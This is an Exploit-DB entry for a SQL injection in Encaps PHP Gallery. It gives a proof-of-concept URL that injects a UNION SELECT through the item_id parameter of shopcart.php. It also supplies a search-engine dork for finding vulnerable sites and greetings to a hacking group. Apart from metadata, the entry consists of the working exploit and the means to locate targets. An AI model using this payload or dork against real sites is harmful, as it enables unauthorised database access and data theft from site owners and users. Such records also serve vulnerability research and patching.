EXPLOITS

Encaps PHP Gallery - SQL Injection

Author: Daniel Godoy
type: webapps
platform: php
port: 
date_added: 2012-03-14  
date_updated: 2012-03-15  
verified: 0  
codes: OSVDB-80068  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comencaps-2.3.22s.zip  

raw file: 18598.txt  

# Exploit Title: Encaps PHP Gallery SQL Injection
# Date: 14/03/2012
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software: Encaps PHP Gallery
# http://www.encaps.net/software/encapsgallery/
# Tested on: Linux
# Dork: "shopcart.php?action=add&item_id="

[Comment]
Greetz: Hernan Jais, Alfonso Cuevas, SPEED, Sensei, Incid3nt,
Maximiliano Soler
    Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
InyeXion,LinuxFer, Scorp
    her0, r0dr1 y demas user de RemoteExecution
    www.remoteexecution.info www.remoteexcution.com.ar
    #RemoteExecution Hacking Group

[PoC]

http://localhost/software/encapsgallery/templates/Shopcart/shopcart.php?action=add&item_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--